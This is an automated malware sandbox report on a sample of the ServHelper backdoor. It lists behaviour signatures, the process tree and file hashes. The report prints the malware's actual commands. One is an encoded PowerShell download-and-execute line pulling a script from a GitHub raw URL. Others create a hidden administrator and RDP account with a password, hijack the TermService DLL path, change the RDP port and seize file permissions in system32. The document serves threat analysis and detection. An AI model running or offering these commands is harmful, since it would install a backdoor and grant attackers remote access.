Analysis
max time kernel: 93s
max time network: 121s
platform: windows10-2004_x64
resource: win10v2004-20231215-en
resource tags: arch:x64, arch:x86, image:win10v2004-20231215-en, locale:en-us, os:windows10-2004-x64, system
submitted: 10-04-2024 09:27
Static task: static1
Behavioral task: behavioral1
Sample: 08a75beea96e15a6bc2e838cf0649ef0e3be100b819d4513b816778f18903c12.exe
Resource: win7-20240221-en
Behavioral task: behavioral2
Sample: 08a75beea96e15a6bc2e838cf0649ef0e3be100b819d4513b816778f18903c12.exe
Resource: win10v2004-20231215-en
General
Target: 08a75beea96e15a6bc2e838cf0649ef0e3be100b819d4513b816778f18903c12.exe
Size: 4.5MB
MD5: 2519d825ce34edc5881380dfe1a2f9c4
SHA1: 642d87e38007682e8c60265ee59e67b09c32eb16
SHA256: 08a75beea96e15a6bc2e838cf0649ef0e3be100b819d4513b816778f18903c12
SHA512: e4dfe0e8f3100824bd74942f4b97d39812055a572a1050ce8b18d0485c3f4bc42eb06c220ad4b145c055af7184ea31ca0274fcb029485f3cf90c8e81613c1ddd
SSDEEP: 49152:E8CdRhKHG/xe5R7w0XQ5lh6aoBaD8NB+uLqXnVMlONTKFMc8XQDmDzE8k/9U1:E8eKHGJG
Malware Config
Extracted
https://raw.githubusercontent.com/sqlitey/sqlite/master/speed.ps1
Signatures
-
ServHelper
ServHelper is a backdoor written in Delphi and is associated with the hacking group TA505.
-
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.
-
Blocklisted process makes network request 7 IoCs
Processes:
flow pid process
24 2136 powershell.exe
26 2136 powershell.exe
28 2136 powershell.exe
32 2136 powershell.exe
34 2136 powershell.exe
36 2136 powershell.exe
38 2136 powershell.exe
-
Modifies RDP port number used by Windows 1 TTPs
-
Possible privilege escalation attempt 8 IoCs
Processes:
pid process
448 icacls.exe
4560 icacls.exe
1756 icacls.exe
1352 icacls.exe
3716 icacls.exe
3312 icacls.exe
1904 icacls.exe
1380 takeown.exe
-
Sets DLL path for service in the registry 2 TTPs 1 IoCs
Processes:
description ioc process
Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\TermService\Parameters\ServiceDLL = "C:\\Windows\\branding\\mediasrv.png" reg.exe
-
Loads dropped DLL 2 IoCs
Processes:
pid process
964 964
-
Modifies file permissions 1 TTPs 8 IoCs
Processes:
pid process
4560 icacls.exe
1756 icacls.exe
1352 icacls.exe
3716 icacls.exe
3312 icacls.exe
1904 icacls.exe
1380 takeown.exe
448 icacls.exe
-
Processes:
resource yara_rule
C:\Windows\Branding\mediasrv.png upx
C:\Windows\Branding\mediasvc.png upx
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
-
Drops file in System32 directory 1 IoCs
Processes:
description ioc process
File created C:\Windows\system32\rfxvmt.dll powershell.exe
-
Drops file in Program Files directory 4 IoCs
Processes:
description ioc process
File opened for modification C:\Program Files\Uninstall Information\IE40.UserAgent\IE40.UserAgent.DAT powershell.exe
File opened for modification C:\Program Files\Uninstall Information\IE40.UserAgent\IE40.UserAgent.INI powershell.exe
File opened for modification C:\Program Files\Uninstall Information\IE.HKCUZoneInfo\IE.HKCUZoneInfo.DAT powershell.exe
File opened for modification C:\Program Files\Uninstall Information\IE.HKCUZoneInfo\IE.HKCUZoneInfo.INI powershell.exe
-
Drops file in Windows directory 18 IoCs
Processes:
description ioc process
File created C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\TMP4352$.TMP powershell.exe
File opened for modification C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\RGI6D13.tmp powershell.exe
File opened for modification C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\RGI6D35.tmp powershell.exe
File created C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log powershell.exe
File created C:\Windows\branding\mediasvc.png powershell.exe
File opened for modification C:\Windows\branding\mediasrv.png powershell.exe
File opened for modification C:\Windows\branding\wupsvc.jpg powershell.exe
File created C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\__PSScriptPolicyTest_5zjuwlo4.nrz.ps1 powershell.exe
File opened for modification C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\RGI6D23.tmp powershell.exe
File opened for modification C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\RGI6D34.tmp powershell.exe
File opened for modification C:\Windows\branding\shellbrd powershell.exe
File opened for modification C:\Windows\branding\mediasvc.png powershell.exe
File created C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\__PSScriptPolicyTest_b2vuby12.bpo.psm1 powershell.exe
File opened for modification C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\RGI6D02.tmp powershell.exe
File created C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe
File created C:\Windows\branding\mediasrv.png powershell.exe
File created C:\Windows\branding\wupsvc.jpg powershell.exe
File opened for modification C:\Windows\branding\Basebrd powershell.exe
-
Detects videocard installed 1 TTPs 1 IoCs
Uses WMIC.exe to determine videocard installed.
-
Modifies data under HKEY_USERS 64 IoCs
-
Modifies registry key 1 TTPs 1 IoCs
-
Runs net.exe
-
Script User-Agent 2 IoCs
Uses user-agent string associated with script host/environment.
Processes:
description flow ioc
HTTP User-Agent header 26 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header 28 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
-
Suspicious behavior: EnumeratesProcesses 14 IoCs
Processes:
pid process
5144 powershell.exe
5144 powershell.exe
5184 powershell.exe
5184 powershell.exe
2068 powershell.exe
2068 powershell.exe
4500 powershell.exe
4500 powershell.exe
5144 powershell.exe
5144 powershell.exe
5144 powershell.exe
2136 powershell.exe
2136 powershell.exe
2136 powershell.exe
-
Suspicious behavior: LoadsDriver 2 IoCs
Processes:
pid process
676 676
-
Suspicious use of AdjustPrivilegeToken 18 IoCs
Processes:
description pid process
Token: SeDebugPrivilege 5144 powershell.exe
Token: SeDebugPrivilege 5184 powershell.exe
Token: SeDebugPrivilege 2068 powershell.exe
Token: SeDebugPrivilege 4500 powershell.exe
Token: SeRestorePrivilege 4560 icacls.exe
Token: SeAssignPrimaryTokenPrivilege 2860 WMIC.exe
Token: SeIncreaseQuotaPrivilege 2860 WMIC.exe
Token: SeAuditPrivilege 2860 WMIC.exe
Token: SeAssignPrimaryTokenPrivilege 2860 WMIC.exe
Token: SeIncreaseQuotaPrivilege 2860 WMIC.exe
Token: SeAuditPrivilege 2860 WMIC.exe
Token: SeAssignPrimaryTokenPrivilege 5488 WMIC.exe
Token: SeIncreaseQuotaPrivilege 5488 WMIC.exe
Token: SeAuditPrivilege 5488 WMIC.exe
Token: SeAssignPrimaryTokenPrivilege 5488 WMIC.exe
Token: SeIncreaseQuotaPrivilege 5488 WMIC.exe
Token: SeAuditPrivilege 5488 WMIC.exe
Token: SeDebugPrivilege 2136 powershell.exe
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes
-
Image (depth 1): C:\Users\Admin\AppData\Local\Temp\08a75beea96e15a6bc2e838cf0649ef0e3be100b819d4513b816778f18903c12.exe
Command line: "C:\Users\Admin\AppData\Local\Temp\08a75beea96e15a6bc2e838cf0649ef0e3be100b819d4513b816778f18903c12.exe"
- Suspicious use of WriteProcessMemory
-
Image (depth 2): C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Command line: "powershell.exe" -ep bypass & 'C:\Users\Admin\AppData\Local\Temp\\ready.ps1'
- Drops file in System32 directory
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
Image (depth 3): C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
Command line: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\wqdafupa\wqdafupa.cmdline"
- Suspicious use of WriteProcessMemory
-
Image (depth 4): C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
Command line: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES470B.tmp" "c:\Users\Admin\AppData\Local\Temp\wqdafupa\CSC9D0637ACDF5F4CC3821AF9E0A38D280.TMP"
-
Image (depth 3): C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
Image (depth 3): C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
Image (depth 3): C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
Image (depth 3): C:\Windows\system32\takeown.exe
Command line: "C:\Windows\system32\takeown.exe" /A /F rfxvmt.dll
- Possible privilege escalation attempt
- Modifies file permissions
-
Image (depth 3): C:\Windows\system32\icacls.exe
Command line: "C:\Windows\system32\icacls.exe" rfxvmt.dll /inheritance:d
- Possible privilege escalation attempt
- Modifies file permissions
-
Image (depth 3): C:\Windows\system32\icacls.exe
Command line: "C:\Windows\system32\icacls.exe" rfxvmt.dll /setowner "NT SERVICE\TrustedInstaller"
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
-
Image (depth 3): C:\Windows\system32\icacls.exe
Command line: "C:\Windows\system32\icacls.exe" rfxvmt.dll /grant "NT SERVICE\TrustedInstaller:F"
- Possible privilege escalation attempt
- Modifies file permissions
-
Image (depth 3): C:\Windows\system32\icacls.exe
Command line: "C:\Windows\system32\icacls.exe" rfxvmt.dll /remove "NT AUTHORITY\SYSTEM"
- Possible privilege escalation attempt
- Modifies file permissions
-
Image (depth 3): C:\Windows\system32\icacls.exe
Command line: "C:\Windows\system32\icacls.exe" rfxvmt.dll /grant "NT AUTHORITY\SYSTEM:RX"
- Possible privilege escalation attempt
- Modifies file permissions
-
Image (depth 3): C:\Windows\system32\icacls.exe
Command line: "C:\Windows\system32\icacls.exe" rfxvmt.dll /remove BUILTIN\Administrators
- Possible privilege escalation attempt
- Modifies file permissions
-
Image (depth 3): C:\Windows\system32\icacls.exe
Command line: "C:\Windows\system32\icacls.exe" rfxvmt.dll /grant BUILTIN\Administrators:RX
- Possible privilege escalation attempt
- Modifies file permissions
-
Image (depth 3): C:\Windows\system32\reg.exe
Command line: "C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f
-
Image (depth 3): C:\Windows\system32\reg.exe
Command line: "C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f
- Sets DLL path for service in the registry
- Modifies registry key
-
Image (depth 3): C:\Windows\system32\reg.exe
Command line: "C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f
-
Image (depth 3): C:\Windows\system32\net.exe
Command line: "C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
- Suspicious use of WriteProcessMemory
-
Image (depth 4): C:\Windows\system32\net1.exe
Command line: C:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
-
Image (depth 3): C:\Windows\system32\cmd.exe
Command line: "C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr
- Suspicious use of WriteProcessMemory
-
Image (depth 4): C:\Windows\system32\cmd.exe
Command line: cmd /c net start rdpdr
- Suspicious use of WriteProcessMemory
-
Image (depth 5): C:\Windows\system32\net.exe
Command line: net start rdpdr
- Suspicious use of WriteProcessMemory
-
Image (depth 6): C:\Windows\system32\net1.exe
Command line: C:\Windows\system32\net1 start rdpdr
-
Image (depth 3): C:\Windows\system32\cmd.exe
Command line: "C:\Windows\system32\cmd.exe" /c cmd /c net start TermService
- Suspicious use of WriteProcessMemory
-
Image (depth 4): C:\Windows\system32\cmd.exe
Command line: cmd /c net start TermService
- Suspicious use of WriteProcessMemory
-
Image (depth 5): C:\Windows\system32\net.exe
Command line: net start TermService
- Suspicious use of WriteProcessMemory
-
Image (depth 6): C:\Windows\system32\net1.exe
Command line: C:\Windows\system32\net1 start TermService
-
Image (depth 3): C:\Windows\system32\cmd.exe
Command line: "C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f
-
Image (depth 3): C:\Windows\system32\cmd.exe
Command line: "C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f
-
Image (depth 1): C:\Windows\System32\cmd.exe
Command line: cmd /C net.exe user WgaUtilAcc 000000 /del
- Suspicious use of WriteProcessMemory
-
Image (depth 2): C:\Windows\system32\net.exe
Command line: net.exe user WgaUtilAcc 000000 /del
- Suspicious use of WriteProcessMemory
-
Image (depth 3): C:\Windows\system32\net1.exe
Command line: C:\Windows\system32\net1 user WgaUtilAcc 000000 /del
-
Image (depth 1): C:\Windows\System32\cmd.exe
Command line: cmd /C net.exe user WgaUtilAcc WyUVN0Zl /add
- Suspicious use of WriteProcessMemory
-
Image (depth 2): C:\Windows\system32\net.exe
Command line: net.exe user WgaUtilAcc WyUVN0Zl /add
- Suspicious use of WriteProcessMemory
-
Image (depth 3): C:\Windows\system32\net1.exe
Command line: C:\Windows\system32\net1 user WgaUtilAcc WyUVN0Zl /add
-
Image (depth 1): C:\Windows\System32\cmd.exe
Command line: cmd /C net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD
- Suspicious use of WriteProcessMemory
-
Image (depth 2): C:\Windows\system32\net.exe
Command line: net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD
-
Image (depth 3): C:\Windows\system32\net1.exe
Command line: C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD
-
Image (depth 1): C:\Windows\System32\cmd.exe
Command line: cmd /C net.exe LOCALGROUP "Remote Desktop Users" GAWKBMOT$ /ADD
-
Image (depth 2): C:\Windows\system32\net.exe
Command line: net.exe LOCALGROUP "Remote Desktop Users" GAWKBMOT$ /ADD
-
Image (depth 3): C:\Windows\system32\net1.exe
Command line: C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" GAWKBMOT$ /ADD
-
Image (depth 1): C:\Windows\System32\cmd.exe
Command line: cmd /C net.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD
-
Image (depth 2): C:\Windows\system32\net.exe
Command line: net.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD
-
Image (depth 3): C:\Windows\system32\net1.exe
Command line: C:\Windows\system32\net1 LOCALGROUP "Administrators" WgaUtilAcc /ADD
-
Image (depth 1): C:\Windows\System32\cmd.exe
Command line: cmd /C net.exe user WgaUtilAcc WyUVN0Zl
-
Image (depth 2): C:\Windows\system32\net.exe
Command line: net.exe user WgaUtilAcc WyUVN0Zl
-
Image (depth 3): C:\Windows\system32\net1.exe
Command line: C:\Windows\system32\net1 user WgaUtilAcc WyUVN0Zl
-
Image (depth 1): C:\Windows\System32\cmd.exe
Command line: cmd.exe /C wmic path win32_VideoController get name
-
Image (depth 2): C:\Windows\System32\Wbem\WMIC.exe
Command line: wmic path win32_VideoController get name
- Detects videocard installed
- Suspicious use of AdjustPrivilegeToken
-
Image (depth 1): C:\Windows\System32\cmd.exe
Command line: cmd.exe /C wmic CPU get NAME
-
Image (depth 2): C:\Windows\System32\Wbem\WMIC.exe
Command line: wmic CPU get NAME
- Suspicious use of AdjustPrivilegeToken
-
Image (depth 1): C:\Windows\System32\cmd.exe
Command line: cmd.exe /C cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
-
Image (depth 2): C:\Windows\system32\cmd.exe
Command line: cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
-
Image (depth 3): C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Command line: powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
- Blocklisted process makes network request
- Drops file in Program Files directory
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v13
Downloads
-
C:\Users\Admin\AppData\Local\Temp\RES470B.tmpFilesize
1KB
MD52fed60c3e2a98d72607dfafbc6f6f7ba
SHA153fa5796bc6b0e3e4e2f29a40467359be0ec2474
SHA256ba2f39b5d9490d462a0b84ce0e3e63f599d8e1d6ee64b994a4aba993bcbc1679
SHA512365c5876f7337ef7f5f3028ba3cdc3ddc8a8c7780c64297d756c284056c3dfdd358906cc3889a06bcda74317a4746771c0a3eecac8eddf36a3951db302df8573
-
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ja0cfd21.3an.ps1Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
C:\Users\Admin\AppData\Local\Temp\ready.ps1Filesize
1KB
MD53447df88de7128bdc34942334b2fab98
SHA1519be4e532fc53a7b8fe2ae21c9b7e35f923d3bb
SHA2569520067abc34ce8a4b7931256e4ca15f889ef61750ca8042f60f826cb6cb2ac9
SHA5122ccf6c187c3e17918daadd1fc7ca6e7dfaf6b958468a9867cca233e3506906164dfeb6104c8324e09d3058b090eab22417695b001ddb84f3d98562aec05eb78f
-
C:\Users\Admin\AppData\Local\Temp\resolve-domain.PS1Filesize
2.5MB
MD51c42eeda1f1bcf1b607aae8a13af258a
SHA13ceae3bbf209e777069cad37f0073c00564b7060
SHA256300199ee623af4efb07d6904e943bb1807f9e58efb6cae448630aa3c16e4fb75
SHA5125579df57fcbb7a4958cb2630e9d4fe7cbbd10821182227e1a64c522c98e254135720f26eda05c2e9c5959b40fed480e90aa10ba47be602d8c843ac965d8a0853
-
C:\Users\Admin\AppData\Local\Temp\wqdafupa\wqdafupa.dllFilesize
3KB
MD50b23b0d02417d619b0f6af4e4d06d1f2
SHA1af4d419bc191eb3356b18a88a77e8dd0e5258039
SHA256b2114df04d37c0e4c5a7df78d4c47cdf4474e1c8c37783167b1b81b6681b85cd
SHA51203bf8c4f8b5e5624ba44535cf627c97cbef0975ab02aaedcdc019afd40039f9548ab94382b61072cb568b0c349552d731ce07e52c9102dab630331a6114ea2b4
-
C:\Windows\Branding\mediasrv.pngFilesize
60KB
MD55e1182125ef143f791788d0dc4bf3e9b
SHA1dfb1e962e91de4a90ebe27d454801ac182e15106
SHA256a3355f5763c1189c54710459c0bb09182491544dc087f301827669947b951b10
SHA512e4db09adcc2c7ce86a8a6cea4fc1522ef6d17466e468137bac6e86849b10839bf0a5a77469fa135f41a1885471433d33d18113c0c23daa604f2e84330e9ad3ea
-
C:\Windows\Branding\mediasvc.pngFilesize
743KB
MD56d38a0137dd439eb26f8f19d2bb50b83
SHA1392ae467b6e5c796669a746d67924529241e51cf
SHA25660fc94385520b4353ddc0d9fda9698f4f61ff74abaf794525b9828f8bc24ed0a
SHA51231141bb3943202b0081078312b3551e0b931520e8dd3661fa75075d016c7d6ad9c9f6e259c555ca4b52e8e7a7344bffbdf65ba0e4f897ecbcf625c3bb09b40b7
-
C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\RGI6D02.tmp
Filesize
24KB
MD5
d0e162c0bd0629323ebb1ed88df890d6
SHA1
cf3fd2652cdb6ff86d1df215977454390ed4d7bc
SHA256
3e6520cd56070637daa5c3d596e57e6b5e3bd1a25a08804ccea1ce4f50358744
SHA512
a9c82f1116fce7052d1c45984e87b8f3b9f9afeb16be558fd1ecbd54327350344f37f32bc5d4baabd3e1cf3ac0de75c8ba569c1e34aaf1094cd04641d137c117
-
C:\Windows\system32\rfxvmt.dll
Filesize
40KB
MD5
dc39d23e4c0e681fad7a3e1342a2843c
SHA1
58fd7d50c2dca464a128f5e0435d6f0515e62073
SHA256
6d9a41a03a3bd5362e3af24f97ba99d2f9927d1375e4f608942a712866d133b9
SHA512
5cb75e04ce9f5c3714e30c4fd5b8dbcd3952c3d756556dd76206111fe5b4e980c6c50209ab0914ab3afe15bd9c33ff0d49463ca11547214122859918de2a58f7
-
\??\PIPE\lsarpc
MD5
d41d8cd98f00b204e9800998ecf8427e
SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
-
\??\c:\Users\Admin\AppData\Local\Temp\wqdafupa\CSC9D0637ACDF5F4CC3821AF9E0A38D280.TMP
Filesize
652B
MD5
6467486360d173ddd72f4550ccb764ca
SHA1
fc61c70e5195b02aebbe7e8ec5ff7b966e9630bc
SHA256
f7a0a2230daa4325397445fbcdb9e3fd11b23e25f5fb54824c0a7150e3081f3a
SHA512
bbbf91749aa2c793fa07a1204b8494b045dd32bb8921ecacfaa96b43e36d19ba960184dab10cd0f0b29542567bf860f49ac80ea8b45e601640a4812dc3c8d484
-
\??\c:\Users\Admin\AppData\Local\Temp\wqdafupa\wqdafupa.0.cs
Filesize
424B
MD5
4864fc038c0b4d61f508d402317c6e9a
SHA1
72171db3eea76ecff3f7f173b0de0d277b0fede7
SHA256
0f5273b8fce9bfd95677be80b808119c048086f8e17b2e9f9964ae8971bd5a84
SHA512
9e59e8bee83e783f8054a3ba90910415edacfa63cc19e5ded9d4f21f7c3005ca48c63d85ce8523a5f7d176aa5f8abafc28f824c10dbfb254eed1ce6e5f55bf31
-
\??\c:\Users\Admin\AppData\Local\Temp\wqdafupa\wqdafupa.cmdline
Filesize
369B
MD5
871027a71f42549e96ad7b4001b974ea
SHA1
0547df0d290e4203f7bedfb42a51360725fe483f
SHA256
87da13785264c45af7b1c0077c12b1f213973f972b862e54236c7b6eadf99649
SHA512
81e3588e3fc7986e11a77119f76ed8f93a7b1c0a133430d500bd814de0edff194078266f8c01b313262433d0f54e18994d35153548a99da43a9e2e27cc03943a
-
memory/2068-63-0x00007FF8BDF40000-0x00007FF8BEA01000-memory.dmp
Filesize
10.8MB
-
memory/2068-53-0x00007FF8BDF40000-0x00007FF8BEA01000-memory.dmp
Filesize
10.8MB
-
memory/2136-104-0x00007FF8BDF40000-0x00007FF8BEA01000-memory.dmp
Filesize
10.8MB
-
memory/2136-145-0x00007FF8BDF40000-0x00007FF8BEA01000-memory.dmp
Filesize
10.8MB
-
memory/2136-142-0x000002185D580000-0x000002185D590000-memory.dmp
Filesize
64KB
-
memory/2636-2-0x000001FE9A290000-0x000001FE9A2A0000-memory.dmp
Filesize
64KB
-
memory/2636-0-0x000001FE9A560000-0x000001FE9A810000-memory.dmp
Filesize
2.7MB
-
memory/2636-98-0x000001FE9A290000-0x000001FE9A2A0000-memory.dmp
Filesize
64KB
-
memory/2636-3-0x000001FE9A290000-0x000001FE9A2A0000-memory.dmp
Filesize
64KB
-
memory/2636-4-0x000001FE9A290000-0x000001FE9A2A0000-memory.dmp
Filesize
64KB
-
memory/2636-93-0x000001FE9A290000-0x000001FE9A2A0000-memory.dmp
Filesize
64KB
-
memory/2636-1-0x00007FF8BDF40000-0x00007FF8BEA01000-memory.dmp
Filesize
10.8MB
-
memory/2636-154-0x00007FF8BDF40000-0x00007FF8BEA01000-memory.dmp
Filesize
10.8MB
-
memory/2636-64-0x00007FF8BDF40000-0x00007FF8BEA01000-memory.dmp
Filesize
10.8MB
-
memory/4500-75-0x00000204214C0000-0x00000204214D0000-memory.dmp
Filesize
64KB
-
memory/4500-76-0x00007FF8BDF40000-0x00007FF8BEA01000-memory.dmp
Filesize
10.8MB
-
memory/4500-74-0x00007FF8BDF40000-0x00007FF8BEA01000-memory.dmp
Filesize
10.8MB
-
memory/5144-109-0x00007FF8BDF40000-0x00007FF8BEA01000-memory.dmp
Filesize
10.8MB
-
memory/5144-146-0x0000018A49970000-0x0000018A49980000-memory.dmp
Filesize
64KB
-
memory/5144-77-0x00007FF8CC440000-0x00007FF8CC459000-memory.dmp
Filesize
100KB
-
memory/5144-7-0x00007FF8BDF40000-0x00007FF8BEA01000-memory.dmp
Filesize
10.8MB
-
memory/5144-23-0x0000018A49970000-0x0000018A49980000-memory.dmp
Filesize
64KB
-
memory/5144-152-0x00007FF8CC440000-0x00007FF8CC459000-memory.dmp
Filesize
100KB
-
memory/5144-151-0x00007FF8BDF40000-0x00007FF8BEA01000-memory.dmp
Filesize
10.8MB
-
memory/5144-39-0x0000018A625D0000-0x0000018A627DA000-memory.dmp
Filesize
2.0MB
-
memory/5144-38-0x0000018A62240000-0x0000018A623B6000-memory.dmp
Filesize
1.5MB
-
memory/5144-37-0x0000018A49970000-0x0000018A49980000-memory.dmp
Filesize
64KB
-
memory/5144-8-0x0000018A49970000-0x0000018A49980000-memory.dmp
Filesize
64KB
-
memory/5144-110-0x0000018A49970000-0x0000018A49980000-memory.dmp
Filesize
64KB
-
memory/5144-34-0x0000018A49960000-0x0000018A49968000-memory.dmp
Filesize
32KB
-
memory/5144-141-0x0000018A49970000-0x0000018A49980000-memory.dmp
Filesize
64KB
-
memory/5144-15-0x0000018A49970000-0x0000018A49980000-memory.dmp
Filesize
64KB
-
memory/5144-14-0x0000018A61BC0000-0x0000018A61BE2000-memory.dmp
Filesize
136KB
-
memory/5144-148-0x0000018A49970000-0x0000018A49980000-memory.dmp
Filesize
64KB
-
memory/5184-52-0x00007FF8BDF40000-0x00007FF8BEA01000-memory.dmp
Filesize
10.8MB
-
memory/5184-49-0x00007FF8BDF40000-0x00007FF8BEA01000-memory.dmp
Filesize
10.8MB
-
memory/5184-50-0x0000016A9BEF0000-0x0000016A9BF00000-memory.dmp
Filesize
64KB
-
memory/5184-51-0x0000016A9BEF0000-0x0000016A9BF00000-memory.dmp
Filesize
64KB